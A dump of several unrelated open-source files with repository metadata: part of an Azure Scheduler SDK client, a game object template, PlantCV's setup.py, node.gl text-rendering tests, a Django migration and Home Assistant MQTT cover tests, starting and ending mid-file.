            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response
        return deserialized
    def delete(
            self, resource_group_name, job_collection_name, custom_headers=None, raw=False, **operation_config):
        """Deletes a job collection.
        :param resource_group_name: The resource group name.
        :type resource_group_name: str
        :param job_collection_name: The job collection name.
        :type job_collection_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :rtype:
         :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
         instance that returns None
        :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
         if raw=true
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Scheduler/jobCollections/{jobCollectionName}'
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'jobCollectionName': self._serialize.url("job_collection_name", job_collection_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct and send request: long-running operation, polled by
        # AzureOperationPoller via the three closures below.
        def long_running_send():
            request = self._client.delete(url, query_parameters)
            return self._client.send(request, header_parameters, **operation_config)
        def get_long_running_status(status_link, headers=None):
            request = self._client.get(status_link)
            if headers:
                request.headers.update(headers)
            return self._client.send(
                request, header_parameters, **operation_config)
        def get_long_running_output(response):
            # 200 and 202 both count as accepted; anything else is an error.
            if response.status_code not in [200, 202]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response
        if raw:
            response = long_running_send()
            return get_long_running_output(response)
        long_running_operation_timeout = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        return AzureOperationPoller(
            long_running_send, get_long_running_output,
            get_long_running_status, long_running_operation_timeout)
    def enable(
            self, resource_group_name, job_collection_name, custom_headers=None, raw=False, **operation_config):
        """Enables all of the jobs in the job collection.
        :param resource_group_name: The resource group name.
        :type resource_group_name: str
        :param job_collection_name: The job collection name.
        :type job_collection_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :rtype:
         :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
         instance that returns None
        :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
         if raw=true
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Scheduler/jobCollections/{jobCollectionName}/enable'
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'jobCollectionName': self._serialize.url("job_collection_name", job_collection_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct and send request: long-running POST to the /enable action.
        def long_running_send():
            request = self._client.post(url, query_parameters)
            return self._client.send(request, header_parameters, **operation_config)
        def get_long_running_status(status_link, headers=None):
            request = self._client.get(status_link)
            if headers:
                request.headers.update(headers)
            return self._client.send(
                request, header_parameters, **operation_config)
        def get_long_running_output(response):
            if response.status_code not in [200, 202]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response
        if raw:
            response = long_running_send()
            return get_long_running_output(response)
        long_running_operation_timeout = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        return AzureOperationPoller(
            long_running_send, get_long_running_output,
            get_long_running_status, long_running_operation_timeout)
    def disable(
            self, resource_group_name, job_collection_name, custom_headers=None, raw=False, **operation_config):
        """Disables all of the jobs in the job collection.
        :param resource_group_name: The resource group name.
        :type resource_group_name: str
        :param job_collection_name: The job collection name.
        :type job_collection_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :rtype:
         :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
         instance that returns None
        :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
         if raw=true
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Scheduler/jobCollections/{jobCollectionName}/disable'
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'jobCollectionName': self._serialize.url("job_collection_name", job_collection_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct and send request: long-running POST to the /disable action.
        def long_running_send():
            request = self._client.post(url, query_parameters)
            return self._client.send(request, header_parameters, **operation_config)
        def get_long_running_status(status_link, headers=None):
            request = self._client.get(status_link)
            if headers:
                request.headers.update(headers)
            return self._client.send(
                request, header_parameters, **operation_config)
        def get_long_running_output(response):
            if response.status_code not in [200, 202]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response
        if raw:
            response = long_running_send()
            return get_long_running_output(response)
        long_running_operation_timeout = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        return AzureOperationPoller(
            long_running_send, get_long_running_output,
            get_long_running_status, long_running_operation_timeout)
|
{
"content_hash": "a939eb028caeac51495e55afb0c5bc7a",
"timestamp": "",
"source": "github",
"line_count": 586,
"max_line_length": 155,
"avg_line_length": 46.26109215017065,
"alnum_prop": 0.644914972887233,
"repo_name": "rjschwei/azure-sdk-for-python",
"id": "d5b4f00b0a8c1157443871782a0e4cc59f79d817",
"size": "27583",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "azure-mgmt-scheduler/azure/mgmt/scheduler/operations/job_collections_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8317911"
}
],
"symlink_target": ""
}
|
from swgpy.object import *
def create(kernel):
    """Build the free-standing lamp furniture tangible for this template."""
    obj = Tangible()
    obj.template = "object/tangible/furniture/all/shared_frn_all_light_lamp_free_s01.iff"
    obj.attribute_template_id = 6
    obj.stfName("frn_n","frn_lamp_free_blueleaf")
    #### BEGIN MODIFICATIONS ####
    #### END MODIFICATIONS ####
    return obj
|
{
"content_hash": "5434e2d98742aceba945f9a4935ff704",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 89,
"avg_line_length": 25.153846153846153,
"alnum_prop": 0.7003058103975535,
"repo_name": "obi-two/Rebelion",
"id": "520302b3b45544d05d6ea0694a01c0e48bbdf3ed",
"size": "472",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/tangible/furniture/all/shared_frn_all_light_lamp_free_s01.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
}
|
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
import sys
import setuptools
from setuptools.command.test import test as TestCommand
from codecs import open
from os import path
class PyTest(TestCommand):
    """Run the test suite with pytest via ``python setup.py test``."""

    def initialize_options(self):
        """Seed the default pytest arguments (verbose run of tests/tests.py)."""
        TestCommand.initialize_options(self)
        self.pytest_args = ["--verbose", "tests/tests.py"]

    def finalize_options(self):
        """Disable setuptools' own test discovery; pytest handles it."""
        TestCommand.finalize_options(self)
        self.test_args = []
        self.test_suite = True

    def run_tests(self):
        """Invoke pytest and exit with its status code."""
        # Imported here so setup.py itself works without pytest installed.
        import pytest

        sys.exit(pytest.main(self.pytest_args))
here = path.abspath(path.dirname(__file__))

# Get the long description from the README file.
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
    long_description = f.read()

# PlantCV requires OpenCV, which is not pip-installable everywhere; fail early
# with a clear message. Chain the original exception so the real import
# failure (e.g. a missing shared library) is not hidden from the user.
try:
    import cv2
except ImportError as err:
    raise ImportError("ERROR: OpenCV package 'cv2' not found.") from err
setuptools.setup(
    name='plantcv',
    # Versions should comply with PEP440. For a discussion on single-sourcing
    # the version across setup.py and the project code, see
    # https://packaging.python.org/en/latest/single_source_version.html
    version='2.0.dev0',
    description='An image processing package for plant phenotyping.',
    long_description=long_description,
    # README.md is Markdown; without this, PyPI renders the long description
    # as plain text.
    long_description_content_type='text/markdown',
    # The project's main homepage.
    url='http://plantcv.danforthcenter.org',
    # Author details
    author='The PlantCV team',
    author_email='plantcv@danforthcenter.org',
    license='MIT',
    # Supported platforms
    platforms=['Any'],
    # See https://pypi.python.org/pypi?%3Aaction=list_classifiers
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Intended Audience :: Science/Research',
        'Topic :: Scientific/Engineering :: Bio-Informatics',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7'
    ],
    keywords='image processing bioinformatics',
    packages=setuptools.find_packages(),
    # Run-time dependencies, installed by pip alongside the package. For an
    # analysis of "install_requires" vs pip's requirements files see:
    # https://packaging.python.org/en/latest/requirements.html
    install_requires=['matplotlib>=1.5', 'numpy>=1.11', 'pandas', 'python-dateutil', 'scipy', 'scikit-image'],
    # Test dependencies and the custom `python setup.py test` runner.
    tests_require=['pytest'],
    cmdclass={'test': PyTest},
)
|
{
"content_hash": "e2777cc02e084e602be43b20f5e31d11",
"timestamp": "",
"source": "github",
"line_count": 136,
"max_line_length": 110,
"avg_line_length": 33.595588235294116,
"alnum_prop": 0.6616327423943971,
"repo_name": "AntonSax/plantcv",
"id": "dfa247c072d6f6568e6301973e7c01302d3ed884",
"size": "4569",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "465369"
},
{
"name": "Shell",
"bytes": "404"
}
],
"symlink_target": ""
}
|
from pynodegl_utils.misc import scene
from pynodegl_utils.tests.cmp_fingerprint import test_fingerprint
from pynodegl_utils.toolbox.colors import COLORS
import pynodegl as ngl
@test_fingerprint(tolerance=1)
@scene()
def text_0_to_127(_):
    """Render ASCII codes 0..127 on an 8x16 grid (NUL is drawn as a space)."""
    rows = []
    for high in range(8):
        codes = [high << 4 | low for low in range(16)]
        rows.append("".join(chr(c) if c else " " for c in codes) + "\n")
    return ngl.Text("".join(rows))
def _text(**params):
    """Build the shared three-line demo text node, forwarding extra options."""
    body = "This\nis\nnode.gl"
    return ngl.Text(body, font_scale=0.7, padding=8, **params)
@test_fingerprint(tolerance=1)
@scene()
def text_colors(_):
    """Fingerprint test for foreground/background text coloring."""
    return _text(bg_color=COLORS.cgreen, bg_opacity=1, fg_color=COLORS.rose)
@test_fingerprint(tolerance=1)
@scene()
def text_align_cc(_):
    """Text anchored center/center."""
    return _text(halign="center", valign="center")


@test_fingerprint(tolerance=1)
@scene()
def text_align_cr(_):
    """Text anchored center/right."""
    return _text(halign="right", valign="center")


@test_fingerprint(tolerance=1)
@scene()
def text_align_cl(_):
    """Text anchored center/left."""
    return _text(halign="left", valign="center")


@test_fingerprint(tolerance=1)
@scene()
def text_align_bc(_):
    """Text anchored bottom/center."""
    return _text(halign="center", valign="bottom")


@test_fingerprint(tolerance=1)
@scene()
def text_align_br(_):
    """Text anchored bottom/right."""
    return _text(halign="right", valign="bottom")


@test_fingerprint(tolerance=1)
@scene()
def text_align_bl(_):
    """Text anchored bottom/left."""
    return _text(halign="left", valign="bottom")


@test_fingerprint(tolerance=1)
@scene()
def text_align_tc(_):
    """Text anchored top/center."""
    return _text(halign="center", valign="top")


@test_fingerprint(tolerance=1)
@scene()
def text_align_tr(_):
    """Text anchored top/right."""
    return _text(halign="right", valign="top")


@test_fingerprint(tolerance=1)
@scene()
def text_align_tl(_):
    """Text anchored top/left."""
    return _text(halign="left", valign="top")
|
{
"content_hash": "cbb604535afb73cb96bfc111752a152a",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 77,
"avg_line_length": 20.567901234567902,
"alnum_prop": 0.6596638655462185,
"repo_name": "gopro/gopro-lib-node.gl",
"id": "66481967ce5869a499570b07db87e2600b3c43f4",
"size": "2491",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/text.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "2212"
},
{
"name": "C",
"bytes": "1975724"
},
{
"name": "Cython",
"bytes": "24206"
},
{
"name": "GLSL",
"bytes": "48760"
},
{
"name": "Java",
"bytes": "1618"
},
{
"name": "Meson",
"bytes": "44524"
},
{
"name": "Objective-C",
"bytes": "31682"
},
{
"name": "PowerShell",
"bytes": "708"
},
{
"name": "Python",
"bytes": "467615"
},
{
"name": "QML",
"bytes": "11826"
},
{
"name": "Shell",
"bytes": "1649"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the songs_artists app: Band (shown as "Artist")
    and Lyrics (shown as "Song").

    Auto-generated migration; the operation code is kept unchanged so
    Django's recorded migration state stays consistent.
    """
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Band',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('band_name', models.CharField(max_length=30, verbose_name='Artist')),
                # upload_to='' stores uploads in MEDIA_ROOT directly.
                ('photo', models.ImageField(blank=True, null=True, upload_to='', verbose_name='Picture')),
                ('notes', models.TextField(blank=True, verbose_name='Extra notes')),
            ],
            options={
                'verbose_name': 'Artist',
                'verbose_name_plural': 'Artists',
            },
        ),
        migrations.CreateModel(
            name='Lyrics',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('song_name', models.CharField(max_length=30, verbose_name='Song name')),
                ('song_lyrics', models.TextField(verbose_name='Lyrics')),
                # PROTECT: a Band cannot be deleted while songs still reference it.
                ('artist', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='songs_artists.Band', verbose_name='Artist')),
            ],
            options={
                'verbose_name': 'Song',
                'verbose_name_plural': 'Songs',
            },
        ),
    ]
|
{
"content_hash": "e37e0f91221f8057b908baac2674e639",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 139,
"avg_line_length": 36.75609756097561,
"alnum_prop": 0.5461181154611812,
"repo_name": "forever-Agriculture/lyrics_site",
"id": "0ff67c15b970e905bd3fcc952480971a8a84fc9f",
"size": "1580",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/apps/songs_artists/migrations/0001_initial.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "56"
},
{
"name": "Elixir",
"bytes": "3002"
},
{
"name": "HTML",
"bytes": "18146"
},
{
"name": "Makefile",
"bytes": "1586"
},
{
"name": "Nginx",
"bytes": "1546"
},
{
"name": "Python",
"bytes": "15905"
},
{
"name": "Shell",
"bytes": "19047"
}
],
"symlink_target": ""
}
|
"""The tests for the MQTT cover platform."""
from unittest.mock import patch
import pytest
from homeassistant.components import cover
from homeassistant.components.cover import (
ATTR_CURRENT_POSITION,
ATTR_CURRENT_TILT_POSITION,
ATTR_POSITION,
ATTR_TILT_POSITION,
)
from homeassistant.components.mqtt import CONF_STATE_TOPIC
from homeassistant.components.mqtt.cover import (
CONF_GET_POSITION_TEMPLATE,
CONF_GET_POSITION_TOPIC,
CONF_SET_POSITION_TEMPLATE,
CONF_SET_POSITION_TOPIC,
CONF_TILT_COMMAND_TEMPLATE,
CONF_TILT_COMMAND_TOPIC,
CONF_TILT_STATUS_TEMPLATE,
CONF_TILT_STATUS_TOPIC,
MQTT_COVER_ATTRIBUTES_BLOCKED,
MqttCover,
)
from homeassistant.const import (
ATTR_ASSUMED_STATE,
ATTR_ENTITY_ID,
CONF_VALUE_TEMPLATE,
SERVICE_CLOSE_COVER,
SERVICE_CLOSE_COVER_TILT,
SERVICE_OPEN_COVER,
SERVICE_OPEN_COVER_TILT,
SERVICE_SET_COVER_POSITION,
SERVICE_SET_COVER_TILT_POSITION,
SERVICE_STOP_COVER,
SERVICE_TOGGLE,
SERVICE_TOGGLE_COVER_TILT,
STATE_CLOSED,
STATE_CLOSING,
STATE_OPEN,
STATE_OPENING,
STATE_UNKNOWN,
)
from homeassistant.setup import async_setup_component
from .test_common import (
help_test_availability_when_connection_lost,
help_test_availability_without_topic,
help_test_custom_availability_payload,
help_test_default_availability_payload,
help_test_discovery_broken,
help_test_discovery_removal,
help_test_discovery_update,
help_test_discovery_update_attr,
help_test_discovery_update_unchanged,
help_test_entity_debug_info_message,
help_test_entity_device_info_remove,
help_test_entity_device_info_update,
help_test_entity_device_info_with_connection,
help_test_entity_device_info_with_identifier,
help_test_entity_id_update_discovery_update,
help_test_entity_id_update_subscriptions,
help_test_setting_attribute_via_mqtt_json_message,
help_test_setting_attribute_with_template,
help_test_setting_blocked_attribute_via_mqtt_json_message,
help_test_unique_id,
help_test_update_with_json_attrs_bad_JSON,
help_test_update_with_json_attrs_not_dict,
)
from tests.common import async_fire_mqtt_message
# Minimal MQTT cover config consumed by the shared help_test_* helpers.
DEFAULT_CONFIG = {
    cover.DOMAIN: {"platform": "mqtt", "name": "test", "state_topic": "test-topic"}
}
async def test_state_via_state_topic(hass, mqtt_mock):
    """Test the controlling state via topic."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "qos": 0,
                "payload_open": "OPEN",
                "payload_close": "CLOSE",
                "payload_stop": "STOP",
            }
        },
    )
    await hass.async_block_till_done()
    # No message received yet -> unknown; a state topic means not optimistic.
    state = hass.states.get("cover.test")
    assert state.state == STATE_UNKNOWN
    assert not state.attributes.get(ATTR_ASSUMED_STATE)
    # Default state payloads are the cover state strings themselves.
    async_fire_mqtt_message(hass, "state-topic", STATE_CLOSED)
    state = hass.states.get("cover.test")
    assert state.state == STATE_CLOSED
    async_fire_mqtt_message(hass, "state-topic", STATE_OPEN)
    state = hass.states.get("cover.test")
    assert state.state == STATE_OPEN
async def test_opening_and_closing_state_via_custom_state_payload(hass, mqtt_mock):
    """Test the controlling opening and closing state via a custom payload."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "qos": 0,
                "payload_open": "OPEN",
                "payload_close": "CLOSE",
                "payload_stop": "STOP",
                "state_opening": "34",
                "state_closing": "--43",
            }
        },
    )
    await hass.async_block_till_done()
    state = hass.states.get("cover.test")
    assert state.state == STATE_UNKNOWN
    assert not state.attributes.get(ATTR_ASSUMED_STATE)
    # The configured custom payloads "34"/"--43" map to opening/closing.
    async_fire_mqtt_message(hass, "state-topic", "34")
    state = hass.states.get("cover.test")
    assert state.state == STATE_OPENING
    async_fire_mqtt_message(hass, "state-topic", "--43")
    state = hass.states.get("cover.test")
    assert state.state == STATE_CLOSING
    async_fire_mqtt_message(hass, "state-topic", STATE_CLOSED)
    state = hass.states.get("cover.test")
    assert state.state == STATE_CLOSED
async def test_open_closed_state_from_position_optimistic(hass, mqtt_mock):
    """Test the state after setting the position using optimistic mode."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "position_topic": "position-topic",
                "set_position_topic": "set-position-topic",
                "qos": 0,
                "payload_open": "OPEN",
                "payload_close": "CLOSE",
                "payload_stop": "STOP",
                "optimistic": True,
            }
        },
    )
    await hass.async_block_till_done()
    state = hass.states.get("cover.test")
    assert state.state == STATE_UNKNOWN
    # Position 0 is assumed closed without waiting for device feedback.
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_SET_COVER_POSITION,
        {ATTR_ENTITY_ID: "cover.test", ATTR_POSITION: 0},
        blocking=True,
    )
    state = hass.states.get("cover.test")
    assert state.state == STATE_CLOSED
    assert state.attributes.get(ATTR_ASSUMED_STATE)
    # Position 100 is assumed open.
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_SET_COVER_POSITION,
        {ATTR_ENTITY_ID: "cover.test", ATTR_POSITION: 100},
        blocking=True,
    )
    state = hass.states.get("cover.test")
    assert state.state == STATE_OPEN
    assert state.attributes.get(ATTR_ASSUMED_STATE)
async def test_position_via_position_topic(hass, mqtt_mock):
    """Test the open/closed state derived from the reported position."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "position_topic": "get-position-topic",
                "position_open": 100,
                "position_closed": 0,
                "command_topic": "command-topic",
                "qos": 0,
                "payload_open": "OPEN",
                "payload_close": "CLOSE",
                "payload_stop": "STOP",
            }
        },
    )
    await hass.async_block_till_done()
    state = hass.states.get("cover.test")
    assert state.state == STATE_UNKNOWN
    assert not state.attributes.get(ATTR_ASSUMED_STATE)
    # Reported position maps onto closed (0) and open (100).
    async_fire_mqtt_message(hass, "get-position-topic", "0")
    state = hass.states.get("cover.test")
    assert state.state == STATE_CLOSED
    async_fire_mqtt_message(hass, "get-position-topic", "100")
    state = hass.states.get("cover.test")
    assert state.state == STATE_OPEN
async def test_state_via_template(hass, mqtt_mock):
    """Test the controlling state via a value template."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "qos": 0,
                "value_template": "\
                {% if (value | multiply(0.01) | int) == 0 %}\
                  closed\
                {% else %}\
                  open\
                {% endif %}",
            }
        },
    )
    await hass.async_block_till_done()
    state = hass.states.get("cover.test")
    assert state.state == STATE_UNKNOWN
    # value/100 truncated: 10000 -> 100 (open), 99 -> 0 (closed).
    async_fire_mqtt_message(hass, "state-topic", "10000")
    state = hass.states.get("cover.test")
    assert state.state == STATE_OPEN
    async_fire_mqtt_message(hass, "state-topic", "99")
    state = hass.states.get("cover.test")
    assert state.state == STATE_CLOSED
async def test_state_via_template_and_entity_id(hass, mqtt_mock):
    """Test the controlling state via a value template referencing entity_id."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "qos": 0,
                "value_template": '\
                {% if value == "open" or value == "closed"  %}\
                  {{ value }}\
                {% else %}\
                  {{ states(entity_id) }}\
                {% endif %}',
            }
        },
    )
    await hass.async_block_till_done()
    state = hass.states.get("cover.test")
    assert state.state == STATE_UNKNOWN
    # An unrecognized payload keeps the current state via states(entity_id).
    async_fire_mqtt_message(hass, "state-topic", "open")
    async_fire_mqtt_message(hass, "state-topic", "invalid")
    state = hass.states.get("cover.test")
    assert state.state == STATE_OPEN
    async_fire_mqtt_message(hass, "state-topic", "closed")
    async_fire_mqtt_message(hass, "state-topic", "invalid")
    state = hass.states.get("cover.test")
    assert state.state == STATE_CLOSED
async def test_state_via_template_with_json_value(hass, mqtt_mock, caplog):
    """Test the controlling state via topic with JSON value."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "qos": 0,
                "value_template": "{{ value_json.Var1 }}",
            }
        },
    )
    await hass.async_block_till_done()
    state = hass.states.get("cover.test")
    assert state.state == STATE_UNKNOWN
    async_fire_mqtt_message(hass, "state-topic", '{ "Var1": "open", "Var2": "other" }')
    state = hass.states.get("cover.test")
    assert state.state == STATE_OPEN
    async_fire_mqtt_message(
        hass, "state-topic", '{ "Var1": "closed", "Var2": "other" }'
    )
    state = hass.states.get("cover.test")
    assert state.state == STATE_CLOSED
    # A payload missing Var1 must only log a template warning, not crash.
    async_fire_mqtt_message(hass, "state-topic", '{ "Var2": "other" }')
    assert (
        "Template variable warning: 'dict object' has no attribute 'Var1' when rendering"
    ) in caplog.text
async def test_position_via_template_and_entity_id(hass, mqtt_mock):
    """Test the cover position via a template referencing entity_id."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "position_topic": "get-position-topic",
                "command_topic": "command-topic",
                "qos": 0,
                "position_template": '\
                {% if state_attr(entity_id, "current_position") == None %}\
                  {{ value }}\
                {% else %}\
                  {{ state_attr(entity_id, "current_position") + value | int }}\
                {% endif %}',
            }
        },
    )
    await hass.async_block_till_done()
    state = hass.states.get("cover.test")
    assert state.state == STATE_UNKNOWN
    # First message sets the position; subsequent ones accumulate onto the
    # current_position attribute (10, then 10 + 10 = 20).
    async_fire_mqtt_message(hass, "get-position-topic", "10")
    current_cover_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_cover_position == 10
    async_fire_mqtt_message(hass, "get-position-topic", "10")
    current_cover_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_cover_position == 20
@pytest.mark.parametrize(
    "config, assumed_state",
    [
        # A command/tilt-command topic without a matching state topic forces
        # optimistic (assumed-state) operation.
        ({"command_topic": "abc"}, True),
        ({"command_topic": "abc", "state_topic": "abc"}, False),
        # ({"set_position_topic": "abc"}, True), - not a valid configuration
        ({"set_position_topic": "abc", "position_topic": "abc"}, False),
        ({"tilt_command_topic": "abc"}, True),
        ({"tilt_command_topic": "abc", "tilt_status_topic": "abc"}, False),
    ],
)
async def test_optimistic_flag(hass, mqtt_mock, config, assumed_state):
    """Test assumed_state is set correctly."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {cover.DOMAIN: {**config, "platform": "mqtt", "name": "test", "qos": 0}},
    )
    await hass.async_block_till_done()
    state = hass.states.get("cover.test")
    assert state.state == STATE_UNKNOWN
    if assumed_state:
        assert ATTR_ASSUMED_STATE in state.attributes
    else:
        assert ATTR_ASSUMED_STATE not in state.attributes
async def test_optimistic_state_change(hass, mqtt_mock):
    """Test changing state optimistically."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "command_topic": "command-topic",
                "qos": 0,
            }
        },
    )
    await hass.async_block_till_done()
    # command_topic only, no state_topic -> assumed state.
    state = hass.states.get("cover.test")
    assert state.state == STATE_UNKNOWN
    assert state.attributes.get(ATTR_ASSUMED_STATE)
    await hass.services.async_call(
        cover.DOMAIN, SERVICE_OPEN_COVER, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
    )
    mqtt_mock.async_publish.assert_called_once_with("command-topic", "OPEN", 0, False)
    mqtt_mock.async_publish.reset_mock()
    state = hass.states.get("cover.test")
    assert state.state == STATE_OPEN
    await hass.services.async_call(
        cover.DOMAIN, SERVICE_CLOSE_COVER, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
    )
    mqtt_mock.async_publish.assert_called_once_with("command-topic", "CLOSE", 0, False)
    mqtt_mock.async_publish.reset_mock()
    state = hass.states.get("cover.test")
    assert state.state == STATE_CLOSED
    # Toggle flips between the assumed open and closed states.
    await hass.services.async_call(
        cover.DOMAIN, SERVICE_TOGGLE, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
    )
    mqtt_mock.async_publish.assert_called_once_with("command-topic", "OPEN", 0, False)
    mqtt_mock.async_publish.reset_mock()
    state = hass.states.get("cover.test")
    assert state.state == STATE_OPEN
    await hass.services.async_call(
        cover.DOMAIN, SERVICE_TOGGLE, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
    )
